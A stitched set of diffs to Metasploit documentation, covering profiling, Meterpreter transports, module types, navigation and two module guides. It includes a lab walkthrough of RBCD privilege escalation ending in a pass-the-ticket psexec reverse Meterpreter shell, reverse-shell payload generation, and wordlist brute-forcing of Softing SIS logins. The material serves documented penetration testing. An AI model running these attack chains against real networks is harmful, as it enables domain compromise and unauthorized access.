+Metasploit has inbuilt tooling for measuring the performance of commands and generating CPU/memory reports after msfconsole or msfvenom is closed.
+
+### Measuring CPU/memory
+
+You can measure CPU/memory usage when starting msfconsole/msfvenom with environment variables:
+
+```
+METASPLOIT_CPU_PROFILE=true ./msfconsole -x 'exit'
+METASPLOIT_MEMORY_PROFILE=true ./msfconsole -x 'exit'
+```
+
+Granular CPU/memory performance can be recorded using Ruby blocks: 
+
+```ruby
+Metasploit::Framework::Profiler.record_cpu do
+  # ...
+end
+```
+
+```ruby
+Metasploit::Framework::Profiler.record_memory do
+  # ...
+end
+```
+
+In both scenarios, reports will be generated and written to disk that can be opened in a file editor/browser.
+
+### Measuring command performance
+
+The `time` command in msfconsole can be used to record the performance of a command:
+
+```msf
+msf6 exploit(windows/smb/ms17_010_psexec) > time reload
+[*] Reloading module...
+[+] Command "reload" completed in 0.20876399998087436 seconds
+```
+
+It is possible to record CPU and memory usage with the `--memory` and `--cpu` flags:
+
+```msf
+msf6 exploit(windows/smb/ms17_010_psexec) > time --cpu search smb
+... etc ...
+Generating CPU dump /var/folders/wp/fp12h8q13kq7mvf4mll72c140000gq/T/msf-profile-2023030711505620230307-77101-4josw1/cpu
+[+] Command "search smb" completed in 0.4150249999947846 seconds
+```
+
+Examples:
+
+```
+time
+time -h
+time --help
+time search smb
+time --memory search smb
+time --cpu search smb
+```
@@ -159,3 +159,30 @@ Module advanced options (auxiliary/scanner/http/title):
   VERBOSE               false                                              no        Enable detailed status messages
   WORKSPACE                                                                no        Specify the workspace for this module
 ```
+
+### HTTP Multiple-Headers
+Additional headers can be set via the `HTTPRawHeaders` option.
+A file containing a ERB template will be used to append to the headers section of the HTTP request.
+An example of an ERB template file is shown below.
+```
+Header-Name-Here: <%= 'content of header goes here' %>
+```
+
+The following output shows leveraging the scraper scanner module with an additional header stored in ```additional_headers.txt```.
+```msf
+msf6 auxiliary(scanner/http/scraper) > cat additional_headers.txt
+[*] exec: cat additional_headers.txt
+
+X-Cookie-Header: <%= 'example-cookie' %>
+msf6 auxiliary(scanner/http/scraper) > set HTTPRAWHEADERS additional_headers.txt
+HTTPRAWHEADERS => additional_headers.txt
+msf6 auxiliary(scanner/http/scraper) > exploit
+
+####################
+# Request:
+####################
+GET / HTTP/1.0
+Host: 172.16.0.63:8000
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15
+X-Cookie-Header: example-cookie
+```
@@ -12,7 +12,7 @@ The Meterpreter that we have known and loved for years has always had the abilit

 Recent modifications to Meterpreter have changed this. Meterpreter has a new [[configuration system|Meterpreter-Configuration]] that supports multiple transports and it now supports the addition of new transports while the session is still running. With the extra transports configured, Meterpreter allows the user to cycle through those transports without shutting down the session.

-Not only that, but Meterpreter will cycle through these transports automatically when communication fails. For more information on the session resiliency features, please view the [Meterpreter Reliable Network Communication][].
+Not only that, but Meterpreter will cycle through these transports automatically when communication fails. For more information on the session resiliency features, please view the [[Meterpreter Reliable Network Communication|[[reliable network communication documentation|./Meterpreter-Reliable-Network-Communication.md]].

 This document describes how multiple transports are added to an existing Meterpreter session.

@@ -78,7 +78,7 @@ The first part of the output is the session expiry time. To learn more about exp

 The above output shows that we have one transport enabled that is using `TCP`. We can infer that the transport was a `reverse_tcp` (rather than `bind_tcp`) due to the fact that there is a host IP address in the transport URL. If it was a `bind_tcp`, this would be blank.

-`Comms T/O` refers to the communications timeout value. `Retry Total` is the total time to attempt reconnects on this transport, and `Retry Wait` indicates how often a retry of the current transport should happen. Each of these is documented in depth in the [Timeout documentation][].
+`Comms T/O` refers to the communications timeout value. `Retry Total` is the total time to attempt reconnects on this transport, and `Retry Wait` indicates how often a retry of the current transport should happen. Each of these is documented in depth in the [[Timeout documentation|./meterpreter-timeout-control.md]].

 The verbose version of this command shows more detail about the transport, but only in cases where extra detail is available (such as `reverse_http/s`). The following command shows the output of the `list` sub-command with the verbose flag (`-v`) after an `HTTP` transport has been added:

@@ -362,6 +362,3 @@ The following Meterpreter implementations currently support the transport comman
 * Android
 * Java
 * Python
-
-  [Timeout documentation]: https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-timeout-control.html
-  [Reliable Network documentation]: https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-reliable-network-communication.html
@@ -0,0 +1,66 @@
+## Metasploit modules
+
+There are currently {{ site.metasploit_total_module_count }} Metasploit modules:
+
+{{ site.metasploit_nested_module_counts | module_tree: "All Modules", true }}
+
+## Module types
+
+### Auxiliary modules ({{ site.metasploit_module_counts["auxiliary"] }})
+
+Auxiliary modules do not exploit a target, but can perform useful tasks such as:
+
+- Administration - Modify, operate, or manipulate something on target machine
+- Analyzing - Tools that perform analysis, mostly password cracking
+- Gathering - Gather, collect, or enumerate data from a single target
+- Denial of Service - Crash or slow a target machine or service
+- Scanning - Scan targets for known vulnerabilities
+- Server Support - Run Servers for common protocols such as SMB, FTP, etc
+
+### Encoder modules ({{ site.metasploit_module_counts["encoder"] }})
+
+Encoders take the raw bytes of a payload and run some sort of encoding algorithm, like bitwise XOR. These modules are useful for encoding
+bad characters such as null bytes.
+
+### Evasion modules ({{ site.metasploit_module_counts["evasion"] }})
+
+Evasion modules give Framework users the ability to generate evasive payloads that aim to evade AntiVirus, such as Windows Defender,
+without having to install external tools.
+
+### Exploit modules ({{ site.metasploit_module_counts["exploit"] }})
+
+Exploit modules are used to leverage vulnerabilities in a manner that allows the framework to execute arbitrary code.
+The arbitrary code that is executed is referred to as the payload.
+
+### Nop modules ({{ site.metasploit_module_counts["nop"] }})
+
+Nop modules, short for 'No Operation', generate a sequence of 'No Operation' instructions that perform no side-effects.
+NOPs are often used in conjunction with stack buffer overflows.
+
+### Payloads modules ({{ site.metasploit_module_counts["payload"] }})
+
+In the context of Metasploit exploit modules, payload modules encapsulate the arbitrary code (shellcode) that is executed
+as the result of an exploit succeeding. This normally involves the creation of a Metasploit session, but may instead
+execute code such as adding user accounts, or executing a simple pingback command that verifies that code execution was successful against a vulnerable target.
+
+Payload modules can also be used individually to generate standalone executables, or shellcode for use within exploits:
+
+```msf
+msf6 payload(linux/x86/shell_reverse_tcp) > back
+msf6 > use payload/linux/x86/shell_reverse_tcp
+msf6 payload(linux/x86/shell_reverse_tcp) > set lhost 127.0.0.1
+lhost => 127.0.0.1
+msf6 payload(linux/x86/shell_reverse_tcp) > set lport 4444
+lport => 4444
+
+# Generate a payload for use within C
+msf6 payload(linux/x86/shell_reverse_tcp) > generate -f c
+
+# Generate an ELF file for execution on Linux environments
+msf6 payload(linux/x86/shell_reverse_tcp) > generate -f elf -o linux_shell
+```
+
+### Post modules ({{ site.metasploit_module_counts["post"] }})
+
+These modules are useful after a machine has been compromised and a Metasploit session has been opened. They perform useful
+tasks such as gathering, collecting, or enumerating data from a session.
@@ -20,7 +20,7 @@ Linux packages are built nightly for .deb (i386, amd64, armhf, arm64) and .rpm (

 ### macOS manual installation

-The latest OS X installer package can also be downloaded directly here: <https://osx.metasploit.com/metasploitframework-latest.pkg>, with the last 10 builds archived at <https://osx.metasploit.com/>. Simply download and launch the installer to install Metaploit Framework with all of its dependencies.
+The latest OS X installer package can also be downloaded directly here: <https://osx.metasploit.com/metasploitframework-latest.pkg>, with the last 8 builds archived at <https://osx.metasploit.com/>. Simply download and launch the installer to install Metasploit Framework with all of its dependencies.

 ## Installing Metasploit on Windows

@@ -232,7 +232,7 @@ The full list of available functions is as follows:
 #### meterpreter.transport

 * `meterpreter.transport.list()` - list all transports in the target.
-* `meterpreter.transport.add(url, session_expiry, comm_timeout, retry_total, retry_wait, ua, proxy_host, proxy_user, proxy_pass, cert_hash)` - allows for transports to be added to the Meterpreter session. All but the `url` parameter come with a sane default. Full details of each of these parameters can be found in the [transport][] documentation.
+* `meterpreter.transport.add(url, session_expiry, comm_timeout, retry_total, retry_wait, ua, proxy_host, proxy_user, proxy_pass, cert_hash)` - allows for transports to be added to the Meterpreter session. All but the `url` parameter come with a sane default. Full details of each of these parameters can be found in the [[transport|meterpreter-transport-control]] documentation.

 It is not possible to delete transports using the python extension as this opens the door to many kinds of failure.

@@ -331,7 +331,6 @@ Hell no! But the goal is to get closer and closer to perfect as we go. It's up t

 Please do, making good use of the Github issues feature. Better still, create a PR for one!

-  [transport]: https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-transport-control.html
  [inveigh]: https://github.com/Kevin-Robertson/Inveigh

 ## Currently Loadable Native Libraries
@@ -6,7 +6,7 @@ The Windows API comes with two ways to talk via HTTP/S, they are [WinInet][] and

 The [WinInet][] API was designed for use in desktop applications. It provides all the features required by applications to use HTTP/S while delegating much of the responsibilty of handling implementation detail to the underlying API and OS. This API can result in some user interface elements appearing if not handled correctly.

-[WinInet][] comes with some limitations, one of which is that it's close to impossible to do any kind of custom validation, parsing, or handling of SSL communications. One of the needs of Metasploit users is to be able to enable a [Paranoid Mode][] that forces Meterpreter to only talk with the appropriate endpoint. The goal is to prevent shells from being hijacked by unauthorised users. In order to do this, one of the things that was implemented was the verification of the SHA1 hash of the SSL certificate that Meterpreter reads from the server. If this hash doesn't match the one that Meterpreter is configured with, Meterpreter will shut down. [WinInet][] doesn't make this process possible without a _lot_ of custom work.
+[WinInet][] comes with some limitations, one of which is that it's close to impossible to do any kind of custom validation, parsing, or handling of SSL communications. One of the needs of Metasploit users is to be able to enable a [[Paranoid Mode|./meterpreter-paranoid-mode.md]] that forces Meterpreter to only talk with the appropriate endpoint. The goal is to prevent shells from being hijacked by unauthorised users. In order to do this, one of the things that was implemented was the verification of the SHA1 hash of the SSL certificate that Meterpreter reads from the server. If this hash doesn't match the one that Meterpreter is configured with, Meterpreter will shut down. [WinInet][] doesn't make this process possible without a _lot_ of custom work.

 For applications such as this, [WinHTTP][] is the "preferred" option as deemed by Microsoft. This API is designed to work under a service, and provides a greater number of ways to interact with communications made over HTTP/S. With this API it was trivial to implement the SHA1 hash verification and force Meterpreter to shut down when a MITM is detected.

@@ -61,5 +61,4 @@ HTTP/S communications in Windows is a hairy beast, and trying to cater for all c
  [WinInet]: https://msdn.microsoft.com/en-us/library/windows/desktop/aa383630%28v=vs.85%29.aspx
  [WinHTTP]: https://msdn.microsoft.com/en-us/library/windows/desktop/aa382925%28v=vs.85%29.aspx
  [winhttp_wininet]: https://msdn.microsoft.com/en-us/library/windows/desktop/hh227298%28v=vs.85%29.aspx
-  [Paranoid Mode]: https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-paranoid-mode.html
-  [OJ]: https://github.com/OJ
+  [OJ]: https://github.com/OJ
@@ -2,7 +2,7 @@

 This is a guide for setting up a developer environment to contribute modules, documentation, and fixes to the Metasploit Framework. If you just want to use Metasploit for legal, authorized hacking, we recommend instead you:

- - Install the [open-source Omnibus installer][open-source-installer], or
+ - Install the [[open-source Omnibus installer|./nightly-installers.md]], or
 - Use the pre-installed Metasploit on [Kali Linux][kali-user-instructions] or [Parrot Linux][parrot-user-instructions].

 If you want to contribute to Metasploit, start by reading our [CONTRIBUTING.md], then follow the rest of this guide.
@@ -155,7 +155,7 @@ cd ~/git/metasploit-framework
 $ ./msfconsole -qx "db_status; exit"
 ```

-Congratulations! You have now set up the [Metasploit Web Service (REST API)][msf-web-service] and the backend database.
+Congratulations! You have now set up the [[Metasploit Web Service (REST API)|./metasploit-web-service.md]] and the backend database.

 ## Optional: Tips to speed up common workflows

@@ -167,7 +167,7 @@ Making sure you're in the right directory to run `msfconsole` can become tedious
 echo 'alias msfconsole="pushd $HOME/git/metasploit-framework && ./msfconsole && popd"' >> ~/.bash_aliases
 ```

-Consider generating a GPG key to sign your commits.  Read about [why][git-horror] and [how][signing-howto]. Once you have done this, consider enabling automatic signing of all your commits with the following command:
+Consider generating a GPG key to sign your commits.  Read about [why][git-horror] and [[how|./committer-keys.md#signing-your-commits-and-merges]. Once you have done this, consider enabling automatic signing of all your commits with the following command:

 ```
 cd *path to your cloned MSF repository on disk*
@@ -212,12 +212,11 @@ You should see over 9000 tests run, mostly resulting in green dots, a few in yel

 # Great!  Now what?

-We're excited to see your upcoming contributions of new modules, documentation, and fixes!  Check out our [wiki documentation][wiki-documentation] and, if you're looking for inspiration, keep an eye out for [newbie-friendly pull requests and issues][newbie-friendly-prs-issues].   Please [submit your new pull requests][howto-PR] and reach out to us on [Slack] for community help.
+We're excited to see your upcoming contributions of new modules, documentation, and fixes! If you're looking for inspiration, keep an eye out for [newbie-friendly pull requests and issues][newbie-friendly-prs-issues].   Please [submit your new pull requests][howto-PR] and reach out to us on [Slack] for community help.

 Finally, we welcome your feedback on this guide, so feel free to reach out to us on [Slack] or open a [new issue].  For their significant contributions to this guide, we would like to thank [@kernelsmith], [@corelanc0d3r], and [@ffmike].

 [commercial-installer]:http://metasploit.com/download
-[open-source-installer]:https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html
 [kali-user-instructions]:https://docs.kali.org/general-use/starting-metasploit-framework-in-kali
 [parrot-user-instructions]:https://parrotsec.org/docs/installation.html
 [CONTRIBUTING.md]:https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md
@@ -240,14 +239,10 @@ Finally, we welcome your feedback on this guide, so feel free to reach out to us
 [find]:https://linux.die.net/man/1/find
 [$PATH]:https://askubuntu.com/questions/109381/how-to-add-path-of-a-program-to-path-environment-variable

-[msf-web-service]:https://docs.metasploit.com/docs/using-metasploit/advanced/metasploit-web-service.html
-
 [git-horror]:https://mikegerwitz.com/papers/git-horror-story#trust-ensure
-[signing-howto]:https://docs.metasploit.com/docs/development/maintainers/committer-keys.html#signing-howto

 [git aliases]:https://git-scm.com/book/en/v2/Git-Basics-Git-Aliases
 [rspec]:https://www.rubyguides.com/2018/07/rspec-tutorial/
-[wiki-documentation]:https://docs.metasploit.com/#metasploit-development
 [newbie-friendly-prs-issues]:https://github.com/rapid7/metasploit-framework/issues?q=is%3Aopen+label%3Anewbie-friendly
 [howto-PR]:https://help.github.com/articles/about-pull-requests/
 [new issue]:https://github.com/rapid7/metasploit-framework/issues/new/choose
@@ -63,10 +63,15 @@ NAVIGATION_CONFIG = [
    path: 'Code-Of-Conduct.md',
    nav_order: 2
  },
+  {
+    path: 'Modules.md',
+    title: 'Modules',
+    nav_order: 3
+  },
  {
    title: 'Pentesting',
    folder: 'pentesting',
-    nav_order: 3,
+    nav_order: 4,
    children: [
      {
        path: 'Metasploit-Guide-Setting-Module-Options.md',
@@ -178,6 +183,10 @@ NAVIGATION_CONFIG = [
              {
                path: '../../documentation/modules/auxiliary/admin/kerberos/ticket_converter.md',
                title: 'Converting kirbi and ccache files'
+              },
+              {
+                path: '../../documentation/modules/auxiliary/admin/ldap/rbcd.md',
+                title: 'RBCD - Resource-based constrained delegation'
              }
            ]
          },
@@ -211,7 +220,7 @@ NAVIGATION_CONFIG = [
  {
    title: 'Using Metasploit',
    folder: 'using-metasploit',
-    nav_order: 4,
+    nav_order: 5,
    children: [
      {
        title: 'Getting Started',
@@ -422,7 +431,7 @@ NAVIGATION_CONFIG = [
  {
    title: 'Development',
    folder: 'development',
-    nav_order: 5,
+    nav_order: 6,
    children: [
      {
        title: 'Get Started ',
@@ -815,6 +824,9 @@ NAVIGATION_CONFIG = [
          },
          {
            path: 'Loading-Test-Modules.md'
+          },
+          {
+            path: 'Measuring-Metasploit-Performance.md'
          }
        ]
      },
@@ -928,6 +940,6 @@ NAVIGATION_CONFIG = [
  },
  {
    path: 'Contact.md',
-    nav_order: 5
+    nav_order: 7
  },
 ].freeze
@@ -1,17 +1,86 @@
-## Vulnerable Application
+## RBCD Exploitation

-This module can read and write the necessary LDAP attributes to configure a particular object for Role Based Constrained
-Delegation (RBCD). When writing, the module will add an access control entry to allow the account specified in
-DELEGATE_FROM to the object specified in DELEGATE_TO. In order for this to succeed, the authenticated user must have
-write access to the target object (the object specified in DELEGATE_TO).
+If an account has the ability to write to the `msDS-AllowedToActOnBehalfOfOtherIdentity` attribute against a target, i.e. having
+`GenericWrite` privileges, this can be abused for privilege escalation.

-## Verification Steps
+The `auxiliary/admin/ldap/rbcd` module can be used to read and write the `msDS-AllowedToActOnBehalfOfOtherIdentity` LDAP attribute against a target
+for Role Based Constrained Delegation (RBCD). When writing, the module will add an access control entry (ACE) to allow the account specified in
+`DELEGATE_FROM` to the object specified in `DELEGATE_TO`. For privilege escalation - the `auxiliary/admin/kerberos/get_ticket` module can then
+be used to request a new Kerberos S4U impersonation ticket for the Administrator account.
+
+In order for the `auxiliary/admin/ldap/rbcd` module to succeed, the authenticated user must have write access to the target object (the object specified in `DELEGATE_TO`).
+
+## Lab setup
+
+For the RBCD attack to work an Active Directory account (i.e. `sandy`) is required with write privileges to the target computer (i.e. `WS01`).
+
+From an admin powershell prompt, first create a new Active Directory account, `sandy`, in your Active Directory environment:
+
+```powershell
+# Create a basic user account
+net user /add sandy Password1!
+
+# Mark the sandy and password as never expiring, to ensure the lab setup still works in the future
+net user sandy /expires:never
+Set-AdUser -Identity sandy -PasswordNeverExpires:$true
+```
+
+Grant Write privileges for sandy to the target machine, i.e. `WS01`:
+
+```powershell
+# Remember to change WS01 to the name of your target Computer (i.e. the output of the hostname command)
+$TargetComputer = Get-ADComputer 'WS01'
+$User = Get-ADUser 'sandy'
+
+# Add GenericWrite access to the user against the target coputer
+$Rights = [System.DirectoryServices.ActiveDirectoryRights] "GenericWrite"
+$ControlType = [System.Security.AccessControl.AccessControlType] "Allow"
+$InheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance] "All"
+$GenericWriteAce = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $User.Sid,$Rights,$ControlType,$InheritanceType
+$TargetComputerAcl = Get-Acl "AD:$($TargetComputer.DistinguishedName)"
+$TargetComputerAcl.AddAccessRule($GenericWriteAce)
+Set-Acl -AclObject $TargetComputerAcl -Path "AD:$($TargetComputer.DistinguishedName)"
+```
+
+Finally Verify the Write privileges for the sandy account:
+
+```powershell
+PS C:\Users\administrator> $TargetComputer = Get-ADComputer 'WS01'
+PS C:\Users\administrator> (Get-ACL "AD:$($TargetComputer.DistinguishedName)").Access| Where-Object { $_.IdentityReference -Match 'sandy' }
+
+ActiveDirectoryRights : GenericWrite
+InheritanceType       : All
+ObjectType            : 00000000-0000-0000-0000-000000000000
+InheritedObjectType   : 00000000-0000-0000-0000-000000000000
+ObjectFlags           : None
+AccessControlType     : Allow
+IdentityReference     : MSFLAB\sandy
+IsInherited           : False
+InheritanceFlags      : ContainerInherit
+PropagationFlags      : None
+```
+
+## Module usage
+
+The `admin/dcerpc/samr_computer` module is generally used to first create a computer account, which requires no permissions:
+
+1. From msfconsole
+2. Do: `use auxiliary/admin/dcerpc/samr_computer`
+3. Set the `RHOSTS`, `SMBUser` and `SMBPass` options
+   a. For the `ADD_COMPUTER` action, if you don't specify `COMPUTER_NAME` or `COMPUTER_PASSWORD` - one will be generated automatically
+   b. For the `DELETE_COMPUTER` action, set the `COMPUTER_NAME` option
+   c. For the `LOOKUP_COMPUTER` action, set the `COMPUTER_NAME` option
+4. Run the module and see that a new machine account was added
+
+Then the `auxiliary/admin/ldap/rbcd` can be used:

 1. Set the `RHOST` value to a target domain controller
-2. Set the `BIND_DN` and `BIND_PW` information to an account with the necessary privileges
+2. Set the `USERNAME` and `PASSWORD` information to an account with the necessary privileges
 3. Set the `DELEGATE_TO` and `DELEGATE_FROM` data store options
 4. Use the `WRITE` action to configure the target for RBCD

+See the Scenarios for a more detailed walk through
+
 ## Actions

 ### FLUSH
@@ -42,13 +111,16 @@ the delegation target.
 ## Scenarios

 ### Window Server 2019 Domain Controller
+
 In the following example the user `MSFLAB\sandy` has write access to the computer account `WS01$`. The sandy account is
-used to add a new computer account to the domain, then configures WS01$ for delegation from the new computer account.
+used to add a new computer account to the domain, then configures `WS01$` for delegation from the new computer account.

 The new computer account can then impersonate any user, including domain administrators, on `WS01$` by authenticating
 with the Service for User (S4U) Kerberos extension.

-```
+First create the computer account:
+
+```msf
 msf6 auxiliary(admin/dcerpc/samr_computer) > show options

 Module options (auxiliary/admin/dcerpc/samr_computer):
@@ -86,9 +158,14 @@ msf6 auxiliary(admin/dcerpc/samr_computer) > run
 [+] 192.168.159.10:445 -   SID:      S-1-5-21-3402587289-1488798532-3618296993-1655
 [*] Auxiliary module execution completed
 msf6 auxiliary(admin/dcerpc/samr_computer) > use auxiliary/admin/ldap/rbcd
-msf6 auxiliary(admin/ldap/rbcd) > set BIND_DN sandy@msflab.local
+```
+
+Now use the RBCD module to read the the current value of `msDS-AllowedToActOnBehalfOfOtherIdentity`:
+
+```msf
+msf6 auxiliary(admin/ldap/rbcd) > set USERNAME sandy@msflab.local
 BIND_DN => sandy@msflab.local
-msf6 auxiliary(admin/ldap/rbcd) > set BIND_PW Password1!
+msf6 auxiliary(admin/ldap/rbcd) > set PASSWORD Password1!
 BIND_PW => Password1!
 msf6 auxiliary(admin/ldap/rbcd) > set RHOSTS 192.168.159.10
 RHOSTS => 192.168.159.10
@@ -102,6 +179,11 @@ msf6 auxiliary(admin/ldap/rbcd) > read
 [+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local
 [*] The msDS-AllowedToActOnBehalfOfOtherIdentity field is empty.
 [*] Auxiliary module execution completed
+```
+
+Writing a new `msDS-AllowedToActOnBehalfOfOtherIdentity` value using the computer account created by `admin/dcerpc/samr_computer`:
+
+```msf
 msf6 auxiliary(admin/ldap/rbcd) > set DELEGATE_FROM DESKTOP-QLSTR9NW$
 DELEGATE_FROM => DESKTOP-QLSTR9NW$
 msf6 auxiliary(admin/ldap/rbcd) > write
@@ -112,6 +194,11 @@ msf6 auxiliary(admin/ldap/rbcd) > write
 [+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local
 [+] Successfully created the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.
 [*] Auxiliary module execution completed
+```
+
+Reading the value of `msDS-AllowedToActOnBehalfOfOtherIdentity` to verify the value is updated:
+
+```msf
 msf6 auxiliary(admin/ldap/rbcd) > read
 [*] Running module against 192.168.159.10

@@ -123,3 +210,38 @@ msf6 auxiliary(admin/ldap/rbcd) > read
 [*] Auxiliary module execution completed
 msf6 auxiliary(admin/ldap/rbcd) >
 ```
+
+Next we can use the `auxiliary/admin/kerberos/get_ticket` module to request a new S4U impersonation ticket for the Administrator
+account using the previously created machine account. For instance requesting a service ticket for SMB access:
+
+```msf
+msf6 auxiliary(admin/kerberos/get_ticket) > run action=GET_TGS rhost=192.168.159.10 username=DESKTOP-QLSTR9NW password=A2HPEkkQzdxQirylqIj7BxqwB7kuUMrT domain=msflab.local spn=cifs/ws01.msflab.local impersonate=Administrator
+[*] Running module against 192.168.159.10
+
+[+] 192.168.159.10:88 - Received a valid TGT-Response
+[*] 192.168.159.10:88 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230222095449_default_192.168.159.10_mit.kerberos.cca_533930.bin
+[*] 192.168.159.10:88 - Getting TGS impersonating Administrator@msflab.local (SPN: cifs/ws01.msflab.local)
+[+] 192.168.159.10:88 - Received a valid TGS-Response
+[*] 192.168.159.10:88 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230222095449_default_192.168.159.10_mit.kerberos.cca_962080.bin
+[+] 192.168.159.10:88 - Received a valid TGS-Response
+[*] 192.168.159.10:88 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230222095449_default_192.168.159.10_mit.kerberos.cca_614556.bin
+[*] Auxiliary module execution completed
+```
+
+The saved TGS can be used in a pass-the-ticket style attack. For instance using the `exploit/windows/smb/psexec` module for a reverse shell:
+
+```msf
+msf6 exploit(windows/smb/psexec) > run lhost=192.168.123.1 rhost=192.168.159.10 username=Administrator smb::auth=kerberos smb::rhostname=ws01.msflab.local domaincontrollerrhost=192.168.159.10 smbdomain=msflab.local smb::krb5ccname=/Users/user/.msf4/loot/20230222095449_default_192.168.159.10_mit.kerberos.cca_614556.bin
+
+[*] Started reverse TCP handler on 192.168.123.1:4444
+[*] 192.168.159.10:445 - Connecting to the server...
+[*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445|msflab.local as user 'Administrator'...
+[*] 192.168.159.10:445 - Loaded a credential from ticket file: /Users/user/.msf4/loot/20230222095449_default_192.168.159.10_mit.kerberos.cca_614556.bin
+[*] 192.168.159.10:445 - Selecting PowerShell target
+[*] 192.168.159.10:445 - Executing the payload...
+[+] 192.168.159.10:445 - Service start timed out, OK if running a command or non-service executable...
+[*] Sending stage (175686 bytes) to 192.168.159.10
+[*] Meterpreter session 3 opened (192.168.123.1:4444 -> 192.168.159.10:60755) at 2023-02-22 10:00:01 +0000
+
+meterpreter >
+```
@@ -0,0 +1,182 @@
+## Description
+
+This module allows you to authenticate to Softing Secure Integration Server.
+
+By default:
+* Credentials are `admin:admin`.
+* HTTP is TCP/8099 and HTTPS is TCP/443. Either one can be used, but the module defaults to TCP/8099.
+
+There does not seem to be a limit to the number of times login attempts can be made.
+
+## Vulnerable Application
+
+This module was tested against version 1.22, installed on Windows Server 2019 Standard x64.
+
+*1.22 Download*
+
+https://industrial.softing.com/products/opc-opc-ua-software-platform/integration-platform/secure-integration-server.html
+
+## Verification Steps
+
+1. Start `msfconsole`
+2. Do: `use auxiliary/scanner/http/softing_sis_login`
+3. Do: `set RHOSTS <target_ip>` OR `set RHOSTS file:/path/to/targets/file` if against several targets
+4. Do: Optional: `set SSL true` if necessary
+5. Do: Optional: `set RPORT 443` if SSL is set
+6. Do: `set USERNAME <username>` if necessary. Default is `admin`
+7. Do: `set PASSWORD <password>` if necessary. Default is `admin`
+8. Do: `run`
+
+If running against several usernames: `set USER_FILE /path/to/usernames_file`
+If using a wordlist (e.g. common passwords): `set PASS_FILE /path/to/passwords_file`
+
+`USER_FILE` and `PASS_FILE` take priority over `USERNAME` and `PASSWORD`.
+
+A `username:password` pair of credentials can be provided by doing `set USERPASS_FILE /path/to/userpass_file`.
+
+## Scenarios
+### Default
+
+In this scenario, the default options were used.
+
+```
+msf6 > use auxiliary/scanner/http/softing_sis_login 
+msf6 auxiliary(scanner/http/softing_sis_login) > set RHOSTS 192.168.50.119
+RHOSTS => 192.168.50.119
+msf6 auxiliary(scanner/http/softing_sis_login) > run
+
+[+] 192.168.50.119:8099 - Success: 'admin:admin'
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/http/softing_sis_login) > 
+```
+
+`creds` output:
+
+```
+msf6 auxiliary(scanner/http/softing_sis_login) > creds
+Credentials
+===========
+
+host            origin          service          public  private  realm  private_type  JtR Format
+----            ------          -------          ------  -------  -----  ------------  ----------
+192.168.50.119  192.168.50.119  8099/tcp (http)  admin   admin           Password      
+
+msf6 auxiliary(scanner/http/softing_sis_login) > 
+```
+
+### Different admin password, SSL in use
+
+In this scenario, the default password for the `admin` user has been changed, and SSL was used.
+
+```
+msf6 > use auxiliary/scanner/http/softing_sis_login 
+msf6 auxiliary(scanner/http/softing_sis_login) > set RHOSTS 192.168.50.119
+RHOSTS => 192.168.50.119
+msf6 auxiliary(scanner/http/softing_sis_login) > set PASSWORD admin123
+PASSWORD => admin123
+msf6 auxiliary(scanner/http/softing_sis_login) > set SSL true
+[!] Changing the SSL option's value may require changing RPORT!
+SSL => true
+msf6 auxiliary(scanner/http/softing_sis_login) > set RPORT 443
+RPORT => 443
+msf6 auxiliary(scanner/http/softing_sis_login) > run
+
+[+] 192.168.50.119:443 - Success: 'admin:admin123'
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/http/softing_sis_login) > 
+```
+
+`creds` output:
+
+```
+msf6 auxiliary(scanner/http/softing_sis_login) > creds
+Credentials
+===========
+
+host            origin          service          public  private  realm  private_type  JtR Format
+----            ------          -------          ------  -------  -----  ------------  ----------
+192.168.50.119  192.168.50.119  8099/tcp (http)  admin   admin           Password      
+192.168.50.119  192.168.50.119  443/tcp (https)  admin   admin123        Password      
+
+msf6 auxiliary(scanner/http/softing_sis_login) > 
+```
+
+### Several targets, using different usernames and passwords
+
+In this scenario, we have several targets that have different usernames and passwords for each.
+All the targets have the Softing Secure Integration Server login page enabled at TCP/8099.
+
+Contents of `usernames.txt`:
+```
+admin
+admin1
+user
+lowpriv
+guest
+```
+
+Contents of `passwords.txt`:
+```
+admin
+admin123
+BadPass
+GoodPass?
+P@ssw0rd
+user
+pass
+password
+lowpriv
+```
+
+Contents of `targets.txt`:
+```
+192.168.50.71
+192.168.50.119
+192.168.50.206
+```
+
+Module output:
+```
+msf6 > use auxiliary/scanner/http/softing_sis_login
+msf6 auxiliary(scanner/http/softing_sis_login) > set RHOSTS file:/home/ubuntu/Documents/targets.txt
+RHOSTS => file:/home/ubuntu/Documents/targets.txt
+msf6 auxiliary(scanner/http/softing_sis_login) > set USER_FILE ~/Documents/usernames.txt
+USER_FILE => ~/Documents/usernames.txt
+msf6 auxiliary(scanner/http/softing_sis_login) > set PASS_FILE ~/Documents/passwords.txt
+PASS_FILE => ~/Documents/passwords.txt
+msf6 auxiliary(scanner/http/softing_sis_login) > set VERBOSE false
+VERBOSE => false
+msf6 auxiliary(scanner/http/softing_sis_login) > run
+
+[+] 192.168.50.71:8099 - Success: 'admin:P@ssw0rd'
+[*] Scanned 1 of 3 hosts (33% complete)
+[+] 192.168.50.119:8099 - Success: 'admin:admin'
+[*] Scanned 2 of 3 hosts (66% complete)
+[+] 192.168.50.206:8099 - Success: 'admin:pass123'
+[+] 192.168.50.206:8099 - Success: 'admin1:admin123'
+[*] Scanned 3 of 3 hosts (100% complete)
+[*] Auxiliary module execution completed
